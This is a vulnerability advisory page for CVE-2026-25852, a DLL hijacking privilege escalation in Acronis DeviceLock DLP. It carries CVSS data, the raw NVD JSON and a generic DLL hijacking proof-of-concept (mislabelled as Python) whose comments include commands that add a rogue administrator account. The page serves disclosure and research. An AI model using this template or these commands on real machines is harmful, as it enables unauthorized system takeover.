Security Vulnerability Report
中文
CVE-2026-25852 CVSS 6.7 MEDIUM

CVE-2026-25852

Published: 2026-04-29 15:16:05
Last Modified: 2026-05-19 15:05:12

Description

Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.93212.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Acronis DeviceLock DLP (Windows) < build 9.0.93212

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// poc_dll.cpp // Generic DLL Hijacking PoC for CVE-2026-25852 // Compile: mingw32-gcc -shared -o malicious.dll poc_dll.cpp #include <windows.h> #include <stdlib.h> BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // Code executed when the DLL is loaded by the vulnerable process // Since the process runs with high privileges, this code runs with high privileges. // Example: Create a new administrative user (Privilege Escalation) // system("net user poc_user P@ssw0rd123! /add"); // system("net localgroup administrators poc_user /add"); // Example: Write a file to prove execution (Safe for testing) HANDLE hFile = CreateFileA("C:\\temp\\cve_2026_25852_poc.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile != INVALID_HANDLE_VALUE) { const char* data = "CVE-2026-25852 Exploited Successfully."; DWORD bytesWritten; WriteFile(hFile, data, strlen(data), &bytesWritten, NULL); CloseHandle(hFile); } break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25852", "sourceIdentifier": "[email protected]", "published": "2026-04-29T15:16:05.313", "lastModified": "2026-05-19T15:05:11.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.93212."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "references": [{"url": "https://security-advisory.acronis.com/advisories/SEC-7217", "source": "[email protected]"}]}}